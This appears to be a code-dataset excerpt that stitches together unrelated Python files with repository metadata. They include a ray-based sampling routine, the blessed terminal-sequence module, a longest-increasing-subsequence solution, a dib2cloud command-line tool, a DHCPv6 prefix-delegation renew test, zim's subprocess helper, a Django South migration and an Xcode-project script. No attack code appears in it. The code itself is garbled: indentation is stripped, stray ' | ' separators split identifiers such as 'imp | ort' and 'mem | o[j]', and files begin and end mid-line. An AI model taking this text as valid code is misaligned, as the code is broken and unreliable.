self.clad.im_factor = 1.0
self.clad_params["im_factor"] = 1.0
p_modes = params["modes"].copy()
num_n_0 = p_modes["num_n"]
num_m_0 = p_modes["num_m" | ]
betas: dict = {}
convs: dict = {}
success = False
catalog = Database().load_catalog()
num_n_max = catalog["num_n"].max()
num_m_max = catalog["num_m"].max()
if not np.isnan(num_n_max):
for num_n, num_m in [
(n, m)
for n in range(num_n_0, num_n_max + 1)
for m in range(num_m_0, num_m_max + 1)
]:
p_modes["num_n"] = num_n
p_modes["num_m"] = num_m
smp = Samples(self.r, self.fill_params, self.clad_params, p_modes)
try:
betas, convs = smp.database.load()
success = True
break
except IndexError:
continue
if not success:
p_modes["num_n"] = num_n_0
p_modes["num_m"] = num_m_0
betas, convs, smp = self.do_sampling(p_modes)
if im_factor != 1.0:
self.clad.im_factor = im_factor
self.clad_params["im_factor"] = im_factor
betas, convs, smp = self.do_sampling_for_im_factor(betas, convs, p_modes)
return betas, convs, smp
def do_sampling(self, p_modes: dict) -> tuple[dict, dict, Samples]:
num_n_0 = p_modes["num_n"]
num_m_0 = p_modes["num_m"]
smp = Samples(self.r, self.fill_params, self.clad_params, p_modes)
ray.shutdown()
try:
ray.init()
p_modes_id = ray.put(p_modes)
pool = ray.util.ActorPool(
SamplesForRay.remote(
self.r, self.fill_params, self.clad_params, p_modes_id
)
for _ in range(psutil.cpu_count())
)
xs_success_wr_list: list[tuple[np.ndarray, np.ndarray]] = list(
pool.map(lambda a, arg: a.wr_sampling.remote(arg), range(num_n_0))
)
num_wr = xs_success_wr_list[0][0].shape[0]
args = []
for n in range(num_n_0):
xs_array, _ = xs_success_wr_list[n]
for iwr in range(num_wr):
args.append((n, iwr, xs_array[iwr]))
xs_success_wi_list: list[tuple[np.ndarray, np.ndarray]] = list(
pool.map(lambda a, arg: a.wi_sampling.remote(arg), args)
)
num_wi = xs_success_wi_list[0][0].shape[0]
xs_success_list: list[tuple[np.ndarray, np.ndarray]] = []
for n in range(num_n_0):
xs_array = np.zeros((num_wr, num_wi, 2 * num_m_0 + 1), dtype=complex)
success_array = np.zeros((num_wr, num_wi, 2 * num_m_0 + 1), dtype=bool)
for iwr in range(num_wr):
i = num_wr * n + iwr
xs_i, success_i = xs_success_wi_list[i]
xs_array[iwr] = xs_i
success_array[iwr] = success_i
xs_success_list.append((xs_array, success_array))
finally:
ray.shutdown()
betas, convs = smp.betas_convs(xs_success_list)
smp.database.save(betas, convs)
return betas, convs, smp
def do_sampling_for_im_factor(
self, betas: dict, convs: dict, p_modes: dict
) -> tuple[dict, dict, SamplesLowLoss]:
smp = SamplesLowLoss(self.r, self.fill_params, self.clad_params, p_modes)
try:
betas, convs = smp.database.load()
except IndexError:
num_n = p_modes["num_n"]
num_m = p_modes["num_m"]
args = []
for iwr in range(len(smp.ws)):
for iwi in range(len(smp.wis)):
xis_list = []
for n in range(num_n):
xis = []
for i in range(num_m + 1):
xis.append(betas[("M", n, i + 1)][iwr, iwi] ** 2)
for i in range(num_m):
xis.append(betas[("E", n, i + 1)][iwr, iwi] ** 2)
xis_list.append(xis)
args.append((iwr, iwi, xis_list))
try:
ray.init()
p_modes_id = ray.put(p_modes)
pool = ray.util.ActorPool(
SamplesLowLossForRay.remote(
|
xtiankisutsa/MARA_Framework | tools/qark/qark/lib/blessed/sequences.py | Python | lgpl-3.0 | 21,604 | 0.000231 | " This sub-module provides 'sequence awareness' for blessed."
__author__ = 'Jeff Quast <contact@jeffquast.com>'
__license__ = 'MIT'
__all__ = ['init_sequence_patterns', 'Sequence', 'SequenceTextWrapper']
import functools
import textwrap
import warnings
import math
import re
_BINTERM_UNSUPPORTED = ('kermit', 'avatar')
_BINTERM_UNSUPPORTED_MSG = ('sequence-awareness for terminals emitting '
'binary-packed capabilities are not supported.')
def _merge_sequences(inp):
"""Merge a list of input sequence patterns for use in a regular expression.
Order by lengthyness (full sequence set precedent over subset),
and exclude any empty (u'') sequences.
"""
return sorted(list(filter(None, inp)), key=len, reverse=True)
def _build_numeric_capability(term, cap, optional=False,
base_num=99, nparams=1):
""" Build regexp from capabilities having matching numeric
parameter contained within termcap value: n->(\d+).
"""
_cap = getattr(term, cap)
opt = '?' if optional else ''
if _cap:
args = (base_num,) * nparams
cap_re = re.escape(_cap(*args))
for num in range(base_num-1, base_num+2):
# search for matching ascii, n-1 through n+2
if str(num) in cap_re:
# modify & return n to matching digit expression
cap_re = cap_re.replace(str(num), r'(\d+)%s' % (opt,))
return cap_re
warnings.warn('Unknown parameter in %r (%r, %r)' % (cap, _cap, cap_re))
return None # no such capability
def _build_any_numeric_capability(term, cap, num=99, nparams=1):
""" Build regexp from capabilities having *any* digit parameters
(substitute matching \d with pattern \d and return).
"""
_cap = getattr(term, cap)
if _cap:
cap_re = re.escape(_cap(*((num,) * nparams)))
cap_re = re.sub('(\d+)', r'(\d+)', cap_re)
if r'(\d+)' in cap_re:
return cap_re
warnings.warn('Missing numerics in %r, %r' % (cap, cap_re))
return None # no such capability
def get_movement_sequence_patterns(term):
""" Build and return set of regexp for capabilities of ``term`` known
to cause movement.
"""
bnc = functools.partial(_build_numeric_capa | bility, term)
return set([
# carriage_return
re.escape(term.cr),
# column_address: Horizontal position, absolute
bnc(cap='hpa'),
# row_address: Vertical position #1 absolute
| bnc(cap='vpa'),
# cursor_address: Move to row #1 columns #2
bnc(cap='cup', nparams=2),
# cursor_down: Down one line
re.escape(term.cud1),
# cursor_home: Home cursor (if no cup)
re.escape(term.home),
# cursor_left: Move left one space
re.escape(term.cub1),
# cursor_right: Non-destructive space (move right one space)
re.escape(term.cuf1),
# cursor_up: Up one line
re.escape(term.cuu1),
# param_down_cursor: Down #1 lines
bnc(cap='cud', optional=True),
# restore_cursor: Restore cursor to position of last save_cursor
re.escape(term.rc),
# clear_screen: clear screen and home cursor
re.escape(term.clear),
# cursor_up: Up one line
re.escape(term.enter_fullscreen),
re.escape(term.exit_fullscreen),
# forward cursor
term._cuf,
# backward cursor
term._cub,
])
def get_wontmove_sequence_patterns(term):
""" Build and return set of regexp for capabilities of ``term`` known
not to cause any movement.
"""
bnc = functools.partial(_build_numeric_capability, term)
bna = functools.partial(_build_any_numeric_capability, term)
return list([
# print_screen: Print contents of screen
re.escape(term.mc0),
# prtr_off: Turn off printer
re.escape(term.mc4),
# prtr_on: Turn on printer
re.escape(term.mc5),
# save_cursor: Save current cursor position (P)
re.escape(term.sc),
# set_tab: Set a tab in every row, current columns
re.escape(term.hts),
# enter_bold_mode: Turn on bold (extra bright) mode
re.escape(term.bold),
# enter_standout_mode
re.escape(term.standout),
# enter_subscript_mode
re.escape(term.subscript),
# enter_superscript_mode
re.escape(term.superscript),
# enter_underline_mode: Begin underline mode
re.escape(term.underline),
# enter_blink_mode: Turn on blinking
re.escape(term.blink),
# enter_dim_mode: Turn on half-bright mode
re.escape(term.dim),
# cursor_invisible: Make cursor invisible
re.escape(term.civis),
# cursor_visible: Make cursor very visible
re.escape(term.cvvis),
# cursor_normal: Make cursor appear normal (undo civis/cvvis)
re.escape(term.cnorm),
# clear_all_tabs: Clear all tab stops
re.escape(term.tbc),
# change_scroll_region: Change region to line #1 to line #2
bnc(cap='csr', nparams=2),
# clr_bol: Clear to beginning of line
re.escape(term.el1),
# clr_eol: Clear to end of line
re.escape(term.el),
# clr_eos: Clear to end of screen
re.escape(term.clear_eos),
# delete_character: Delete character
re.escape(term.dch1),
# delete_line: Delete line (P*)
re.escape(term.dl1),
# erase_chars: Erase #1 characters
bnc(cap='ech'),
# insert_line: Insert line (P*)
re.escape(term.il1),
# parm_dch: Delete #1 characters
bnc(cap='dch'),
# parm_delete_line: Delete #1 lines
bnc(cap='dl'),
# exit_alt_charset_mode: End alternate character set (P)
re.escape(term.rmacs),
# exit_am_mode: Turn off automatic margins
re.escape(term.rmam),
# exit_attribute_mode: Turn off all attributes
re.escape(term.sgr0),
# exit_ca_mode: Strings to end programs using cup
re.escape(term.rmcup),
# exit_insert_mode: Exit insert mode
re.escape(term.rmir),
# exit_standout_mode: Exit standout mode
re.escape(term.rmso),
# exit_underline_mode: Exit underline mode
re.escape(term.rmul),
# flash_hook: Flash switch hook
re.escape(term.hook),
# flash_screen: Visible bell (may not move cursor)
re.escape(term.flash),
# keypad_local: Leave 'keyboard_transmit' mode
re.escape(term.rmkx),
# keypad_xmit: Enter 'keyboard_transmit' mode
re.escape(term.smkx),
# meta_off: Turn off meta mode
re.escape(term.rmm),
# meta_on: Turn on meta mode (8th-bit on)
re.escape(term.smm),
# orig_pair: Set default pair to its original value
re.escape(term.op),
# parm_ich: Insert #1 characters
bnc(cap='ich'),
# parm_index: Scroll forward #1
bnc(cap='indn'),
# parm_insert_line: Insert #1 lines
bnc(cap='il'),
# erase_chars: Erase #1 characters
bnc(cap='ech'),
# parm_rindex: Scroll back #1 lines
bnc(cap='rin'),
# parm_up_cursor: Up #1 lines
bnc(cap='cuu'),
# scroll_forward: Scroll text up (P)
re.escape(term.ind),
# scroll_reverse: Scroll text down (P)
re.escape(term.rev),
# tab: Tab to next 8-space hardware tab stop
re.escape(term.ht),
# set_a_background: Set background color to #1, using ANSI escape
bna(cap='setab', num=1),
bna(cap='setab', num=(term.number_of_colors - 1)),
# set_a_foreground: Set foreground color to #1, using ANSI escape
bna(cap='setaf', num=1),
bna(cap='setaf', num=(term.number_of_colors - 1)),
] + [
# set_attributes: Define video attributes #1-#9 (PG9)
# ( not *exactly* legal, being extra forgiving. )
bna(cap='sgr', nparams=_num) for _num in range(1, 10)
# reset_{1,2,3}string: Reset string
] + map(re.escape, (term.r1, term.r2, term. |
tristan-hunt/UVaProblems | sdi.py | Python | gpl-3.0 | 1,195 | 0.057741 | import sys
#seq = list()
def memo_lis(i, memo = 0):
if memo == 0:
memo = dict()
if i == 0:
if i not in memo: #if memo[i] == None:
memo[i] = ([seq[i]])
return([seq[i]])
else:
ans = [seq[i]]
for j in range(0, i):
if seq[i] > seq[j]: # We can add seq[i] after seq[j]
if j not in memo: #if (memo[j] == None):
mem | o[j] = memo_lis(j, memo)
if len(memo[j])+1 > len(ans):
ans = memo[j][::1]
ans.append(seq[i])
memo[i] = ans
return(memo[i])
def print_max():
best = [seq[0]]
memo = dict()
for i in range(0, len(seq)):
if (len(memo_lis(i, memo)) > len(best)):
best = memo_lis(i, memo)
sys.stdout.write("Max hits: {}\n".format(len(best)))
for i in range(0, len(best)):
sys.stdout.write("{}\n".format(best[i]) | )
def load():
this_seq = list()
next(sys.stdin) #eat the blank line
while(1):
a = next(sys.stdin)
if a == '\n':
if len(this_seq) == 0: # Handling blank newline cases
this_seq = [0]
yield(this_seq)
this_seq = list()
else:
a = int(a)
this_seq.append(a)
cases = int(next(sys.stdin))
c = 0
for this_seq in load():
seq = this_seq
if (c):
sys.stdout.write("\n")
print_max()
c = c + 1
|
greghaynes/dib2cloud | dib2cloud/cmd.py | Python | apache-2.0 | 2,959 | 0 | import argparse
import json
imp | ort sys
from dib2cloud import app
# This gives us a convenient place to monkeypatch for testing
def output(out):
print(out)
def upload_summary_dict(upload):
status = 'uploading'
if upload.glance_uuid is not None:
status = 'completed'
retu | rn {
'upload_name': upload.upload_name,
'glance_uuid': upload.glance_uuid,
'status': status
}
def dib_summary_dict(dib, status_str=None):
if status_str is None:
status = dib.succeeded()
if status[0] is True:
status_str = 'completed'
else:
if status[1] == app.DibError.StillRunning:
status_str = 'building'
else:
status_str = 'error'
if dib.is_running():
pid = dib.pid
else:
pid = None
return {
'name': dib.name,
'status': status_str,
'id': dib.uuid,
'pid': pid,
'log': dib.log_path,
'destinations': dib.dest_paths
}
def cmd_build(d2c, args):
dib = d2c.build(args.image_name)
output(json.dumps(dib_summary_dict(dib)).encode('utf-8'))
def cmd_list_builds(d2c, args):
dibs = d2c.get_builds()
output(json.dumps(list(map(dib_summary_dict, dibs))).encode('utf-8'))
def cmd_delete_build(d2c, args):
dib = d2c.delete_build(args.build_id)
output(json.dumps(dib_summary_dict(dib, 'deleted')).encode('utf-8'))
def cmd_upload(d2c, args):
upload = d2c.upload(args.build_id, args.cloud_name)
output(json.dumps(upload_summary_dict(upload)).encode('utf-8'))
def cmd_list_uploads(d2c, args):
uploads = d2c.get_uploads()
output(json.dumps(list(map(upload_summary_dict, uploads))).encode('utf-8'))
def main(argv=None):
argv = argv or sys.argv
parser = argparse.ArgumentParser(prog='dib2cloud')
parser.add_argument('--config', dest='config_path', type=str,
default='/etc/dib2cloud.conf')
subparsers = parser.add_subparsers(help='sub-command help')
build_subparser = subparsers.add_parser('build')
build_subparser.set_defaults(func=cmd_build)
build_subparser.add_argument('image_name', type=str)
list_builds_subparser = subparsers.add_parser('list-builds')
list_builds_subparser.set_defaults(func=cmd_list_builds)
delete_build_subparser = subparsers.add_parser('delete-build')
delete_build_subparser.set_defaults(func=cmd_delete_build)
delete_build_subparser.add_argument('build_id', type=str)
upload_subparser = subparsers.add_parser('upload')
upload_subparser.set_defaults(func=cmd_upload)
upload_subparser.add_argument('build_id', type=str)
upload_subparser.add_argument('cloud_name', type=str)
list_uploads_subparser = subparsers.add_parser('list-uploads')
list_uploads_subparser.set_defaults(func=cmd_list_uploads)
args = parser.parse_args(argv[1:])
args.func(app.App(config_path=args.config_path), args)
|
mwrlabs/veripy | contrib/rfc3633/dr/renew_message.py | Python | gpl-3.0 | 1,596 | 0.008772 | from contrib.rfc3315.constants import *
from contrib.rfc3633.dhcpv6_pd import DHCPv6PDHelper
from scapy.all import *
from veripy.assertions import *
class RenewMessageTestCase(DHCPv6PDHelper):
"""
Requesting Router Initi | ated: Renew Message
Verify that a device can properly | interoperate while using DHCPv6-PD
@private
Source: IPv6 Ready DHCPv6 Interoperability Test Suite (Section 4.2)
"""
def run(self):
prefix, p = self.do_dhcpv6_pd_handshake_as_client(self.target(1), self.node(1))
self.logger.info("Acquired the prefix %s from the DR (T1=%d)." % (prefix, p[DHCP6OptIA_PD].T1))
for i in range(0, 2):
self.ui.wait(p[DHCP6OptIA_PD].T1)
self.node(1).clear_received()
self.logger.info("Sending a DHCPv6 Renew message...")
self.node(1).send(
IPv6(src=str(self.node(1).link_local_ip()), dst=str(AllDHCPv6RelayAgentsAndServers))/
UDP(sport=DHCPv6SourcePort, dport=DHCPv6DestPort)/
self.build_dhcpv6_pd_renew(p, self.target(1), self.node(1)))
self.logger.info("Checking for a DHCPv6 Reply message...")
r1 = self.node(1).received(src=self.target(1).link_local_ip(), type=DHCP6_Reply)
assertEqual(1, len(r1), "expected to receive a DHCPv6 Reply message")
assertHasLayer(DHCP6OptIA_PD, r1[0], "expected the DHCPv6 Reply to contain an IA for Prefix Delegation")
assertHasLayer(DHCP6OptIAPrefix, r1[0], "expected the DHCPv6 Reply to contain an IA Prefix")
|
Osndok/zim-desktop-wiki | zim/applications.py | Python | gpl-2.0 | 11,848 | 0.026671 | # -*- coding: utf-8 -*-
# Copyright 2009,2014 Jaap Karssenberg <jaap.karssenberg@gmail.com>
'''This module contains helper classes for running external applications.
See L{zim.gui.applications} for classes with desktop integration for
applications defined in desktop entry files.
'''
import sys
import os
import logging
import subprocess
import gobject
import zim.fs
import zim.errors
from zim.fs import File
from zim.parsing import split_quoted_strings, is_uri_re, is_win32_path_re
from zim.environ import environ
logger = logging.getLogger('zim.applications')
def _main_is_frozen():
# Detect whether we are running py2exe compiled version
return hasattr(sys, 'frozen') and sys.frozen
class ApplicationError(zim.errors.Error):
'''Error raises for error in sub process errors'''
description = None
def __init__(self, cmd, args, retcode, stderr):
'''Constructor
@param cmd: the application command as string
@param args: tuple of arguments given to the command
@param retcode: the return code of the command (non-zero!)
@param stderr: the error output of the command
'''
self.msg = _('Failed to run application: %s') % cmd
# T: Error message when external application failed, %s is the command
self.description = \
_('%(cmd)s\nreturned non-zero exit status %(code)i') \
% {'cmd': cmd + ' "' + '" "'.join(args) + '"', 'code': retcode}
# T: Error message when external application failed, %(cmd)s is the command, %(code)i the exit code
if stderr:
self.description += '\n\n' + stderr
class Application(object):
'''Base class for objects representing an external application or
command.
@ivar name: the name of the command (default to first item of C{cmd})
@ivar cmd: the command and arguments as a tuple or a string
(when given as a string it will be parsed for quoted arguments)
@ivar tryexeccmd: the command to check in L{tryexec()}, if C{None}
fall back to first item of C{cmd}
'''
STATUS_OK = 0 #: return code when the command executed succesfully
def __init__(self, cmd, tryexeccmd=None, encoding=None):
'''Constructor
@param cmd: the command for the external application, either a
string for the command, or a tuple or list with the command
and arguments
@param tryexeccmd: command to check in L{tryexec()} as st | ring.
If C{None} will default to C{cmd} or the first item of C{cmd}.
@param enco | ding: the encoding to use for commandline args
if known, else falls back to system default
'''
if isinstance(cmd, basestring):
cmd = split_quoted_strings(cmd)
else:
assert isinstance(cmd, (tuple, list))
assert tryexeccmd is None or isinstance(tryexeccmd, basestring)
self.cmd = tuple(cmd)
self.tryexeccmd = tryexeccmd
self.encoding = encoding or zim.fs.ENCODING
if self.encoding == 'mbcs':
self.encoding = 'utf-8'
def __repr__(self):
if hasattr(self, 'key'):
return '<%s: %s>' % (self.__class__.__name__, self.key)
elif hasattr(self, 'cmd'):
return '<%s: %s>' % (self.__class__.__name__, self.cmd)
else:
return '<%s: %s>' % (self.__class__.__name__, self.name)
@property
def name(self):
return self.cmd[0]
@staticmethod
def _lookup(cmd):
'''Lookup cmd in PATH'''
if zim.fs.isabs(cmd):
if zim.fs.isfile(cmd):
return cmd
else:
return None
elif os.name == 'nt':
# Check executable extensions from windows environment
extensions = environ.get_list('PATHEXT', '.com;.exe;.bat;.cmd')
for dir in environ.get_list('PATH'):
for ext in extensions:
file = os.sep.join((dir, cmd + ext))
if zim.fs.isfile(file) and os.access(file, os.X_OK):
return file
else:
return None
else:
# On POSIX no extension is needed to make scripts executable
for dir in environ.get_list('PATH'):
file = os.sep.join((dir, cmd))
if zim.fs.isfile(file) and os.access(file, os.X_OK):
return file
else:
return None
def _cmd(self, args):
# substitute args in the command - to be overloaded by child classes
if args:
return self.cmd + tuple(map(unicode, args))
else:
return self.cmd
def tryexec(self):
'''Check if the executable exists without calling it. This
method is used e.g. to decide what applications to show in the
gui. Uses the C{tryexeccmd}, or the first item of C{cmd} as the
executable name.
@returns: C{True} when the executable was found
'''
cmd = self.tryexeccmd or self.cmd[0]
return not self._lookup(cmd) is None
def _checkargs(self, cwd, args):
assert args is None or isinstance(args, (tuple, list))
argv = self._cmd(args)
# Expand home dir
if argv[0].startswith('~'):
cmd = File(argv[0]).path
argv = list(argv)
argv[0] = cmd
# if it is a python script, insert interpreter as the executable
if argv[0].endswith('.py') and not _main_is_frozen():
argv = list(argv)
argv.insert(0, sys.executable)
# TODO: consider an additional commandline arg to re-use compiled python interpreter
argv = [a.encode(self.encoding) for a in argv]
if cwd:
cwd = unicode(cwd).encode(zim.fs.ENCODING)
return cwd, argv
def run(self, args=None, cwd=None):
'''Run the application in a sub-process and wait for it to finish.
Even when the application runs successfully, any message to stderr
is logged as a warning by zim.
@param args: additional arguments to give to the command as tuple or list
@param cwd: the folder to set as working directory for the command
@raises ApplicationError: if the sub-process returned an error.
'''
cwd, argv = self._checkargs(cwd, args)
logger.info('Running: %s (cwd: %s)', argv, cwd)
if os.name == 'nt':
# http://code.activestate.com/recipes/409002/
info = subprocess.STARTUPINFO()
try:
info.dwFlags |= subprocess.STARTF_USESHOWWINDOW
except AttributeError:
info.dwFlags |= 1 # STARTF_USESHOWWINDOW = 0x01
p = subprocess.Popen(argv,
cwd=cwd,
stdout=open(os.devnull, 'w'),
stderr=subprocess.PIPE,
startupinfo=info,
bufsize=4096,
#~ close_fds=True
)
else:
p = subprocess.Popen(argv,
cwd=cwd,
stdout=open(os.devnull, 'w'),
stderr=subprocess.PIPE,
bufsize=4096,
close_fds=True
)
stdout, stderr = p.communicate()
if not p.returncode == self.STATUS_OK:
raise ApplicationError(argv[0], argv[1:], p.returncode, stderr)
#~ elif stderr:
#~ logger.warn(stderr)
def pipe(self, args=None, cwd=None, input=None):
'''Run the application in a sub-process and capture the output.
Like L{run()}, but connects to stdin and stdout for the sub-process.
@note: The data read is buffered in memory, so do not use this
method if the data size is large or unlimited.
@param args: additional arguments to give to the command as tuple or list
@param cwd: the folder to set as working directory for the command
@param input: input for the command as string
@returns: output as a list of lines
@raises ApplicationError: if the sub-process returned an error.
'''
cwd, argv = self._checkargs(cwd, args)
logger.info('Running: %s (cwd: %s)', argv, cwd)
p = subprocess.Popen(argv, cwd=cwd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate(input)
# TODO: handle ApplicationERror here as well ?
#~ if not p.returncode == self.STATUS_OK:
#~ raise ApplicationError(argv[0], argv[1:], p.returncode, stderr)
#~ elif stderr:
if stderr:
logger.warn(stderr)
# TODO: allow user to get this error as well - e.g. for logging image generator cmd
# Explicit newline conversion, e.g. on windows \r\n -> \n
# FIXME Assume local encoding is respected (!?)
text = [unicode(line + '\n', errors='replace') for line in stdout.splitlines()]
if text and text[-1].endswith('\n') and not stdout.endswith('\n'):
text[-1] = text[-1][:-1] # strip additional \n
return text
def spawn(self, args=None, callback=None, data=None, cwd=None):
'''Start the application in the background and return immediately.
This is used to start an external in parallel with zim that is
not expected to exit immediatly, so we do not want to wait for
it - e.g. a webbrowser to show an URL that was clicked.
@param args: additional arguments to give to the command as |
ctaylo37/OTM2 | opentreemap/treemap/migrations/0079_convert_species_null_values_to_empty_strings.py | Python | gpl-3.0 | 22,255 | 0.007953 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
def forwards(self, orm):
for field in ('species', 'cultivar', 'other', 'gender', 'bloom_period',
'fruit_period', 'fact_sheet', 'plant_guide'):
orm.Species.objects.filter(**{field + '__isnull': True}) \
.update(**{field: ''})
def backwards(self, orm):
"Write your b | ackwards methods here."
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
| },
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'treemap.audit': {
'Meta': {'object_name': 'Audit'},
'action': ('django.db.models.fields.IntegerField', [], {}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'db_index': 'True', 'blank': 'True'}),
'current_value': ('django.db.models.fields.TextField', [], {'null': 'True', 'db_index': 'True'}),
'field': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'instance': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['treemap.Instance']", 'null': 'True', 'blank': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'db_index': 'True'}),
'model_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'db_index': 'True'}),
'previous_value': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'ref': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['treemap.Audit']", 'null': 'True'}),
'requires_auth': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'db_index': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['treemap.User']"})
},
u'treemap.benefitcurrencyconversion': {
'Meta': {'object_name': 'BenefitCurrencyConversion'},
'co2_lb_to_currency': ('django.db.models.fields.FloatField', [], {}),
'currency_symbol': ('django.db.models.fields.CharField', [], {'max_length': '5'}),
'electricity_kwh_to_currency': ('django.db.models.fields.FloatField', [], {}),
'h20_gal_to_currency': ('django.db.models.fields.FloatField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'natural_gas_kbtu_to_currency': ('django.db.models.fields.FloatField', [], {}),
'nox_lb_to_currency': ('django.db.models.fields.FloatField', [], {}),
'o3_lb_to_currency': ('django.db.models.fields.FloatField', [], {}),
'pm10_lb_to_currency': ('django.db.models.fields.FloatField', [], {}),
'sox_lb_to_currency': ('django.db.models.fields.FloatField', [], {}),
'voc_lb_to_currency': ('django.db.models.fields.FloatField', [], {})
},
u'treemap.boundary': {
'Meta': {'object_name': 'Boundary'},
'category': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'geom': ('django.contrib.gis.db.models.fields.MultiPolygonField', [], {'srid': '3857', 'db_column': "u'the_geom_webmercator'"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'sort_order': ('django.db.models.fields.IntegerField', [], {})
},
u'treemap.fieldpermission': {
'Meta': {'unique_together': "((u'model_name', u'field_name', u'role', u'instance'),)", 'object_name': 'FieldPermission'},
'field_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'instance': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['treemap.Instance']"}),
'model_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'permission_level': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'role': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['treemap.Role']"})
},
u'treemap.instance': {
'Meta': {'object_name': 'Instance'},
'adjuncts_timestamp': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'basemap_data': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'basemap_type': ('django.db.models.fields.CharField', [], {'default': "u'google'", 'max_length': '255'}),
'boundaries': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['treemap.Boundary']", 'null': 'True', 'blank': 'True'}),
'bounds': ('django.contrib.gis.db.models.fields.MultiPolygonField', [], {'srid': '3857'}),
'center_override': ('django.contrib.gis.db.models.fields.PointField', [], {'srid': '3857', 'null': 'True', 'blank': 'True'}),
'config': ('treemap.json_field.JSONField', [], {'blank': 'True'}),
'default_role': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'default_role'", 'to': u"orm['treemap.Role']"}),
'eco_benefits_conversion': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['treemap.BenefitCurrencyConversion']", 'null': 'True', 'blank': 'True'}),
'geo_rev': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'itree_region_default': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True', 'blank': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'url_name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'users': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['treemap.User |
mikr/xcodeprojer | examples/gidhistograms.py | Python | mit | 9,342 | 0.002141 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2014 Michael Krause ( http://krause-software.com/ ).
# You are free to use this code under the MIT license:
# http://opensource.org/licenses/MIT
"""Show some histograms for a directory a Xcode project files."""
from __future__ import print_function
import sys
import argparse
from os.path import abspath, dirname, join
import multiprocessing
from collections import defaultdict, Counter
import codecs
# Set up the Python path so we find the xcodeprojer module in the parent directory
# relative to this file.
sys.path.insert(1, dirname(dirname(abspath(__file__))))
import utils
import xcodeprojer
from xcodeprojer import bytestr, unistr
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
if PY2:
text_type = unicode
binary_type = str
else:
text_type = str
binary_type = bytes
unichr = chr
try:
NARROW_BUILD = len(unichr(0x1f300)) == 2
except ValueError:
NARROW_BUILD = True
DEFAULT_FIRSTNAMES = 200
user_hash = xcodeprojer.UniqueXcodeIDGenerator.user_hash
emojis = []
def here():
return dirname(abspath(__file__))
def rel(filename):
return join(here(), filename)
def write(s, end='\n'):
s = unistr(s) + unistr(end)
s = s.encode('utf-8')
if PY2:
sys.stdout.write(s)
else:
sys.stdout.buffer.write(s)
def writeline():
write('\n')
def uniord(s):
"""ord that works on surrogate pairs.
"""
try:
return ord(s)
except TypeError:
pass
if len(s) != 2:
raise
return 0x10000 + ((ord(s[0]) - 0xd800) << 10) | (ord(s[1]) - 0xdc00)
def iterchars(text):
if not NARROW_BUILD:
for c in text:
yield c
idx = 0
while idx < len(text):
c = text[idx]
if ord(c) >= 0x100:
# When we are running on a narrow Python build
# we have to deal with surrogate pairs ourselves.
if ((0xD800 < ord(c) <= 0xDBFF)
and (idx < len(text) - 1)
and (0xDC00 < ord(text[idx + 1]) <= 0xDFFF)):
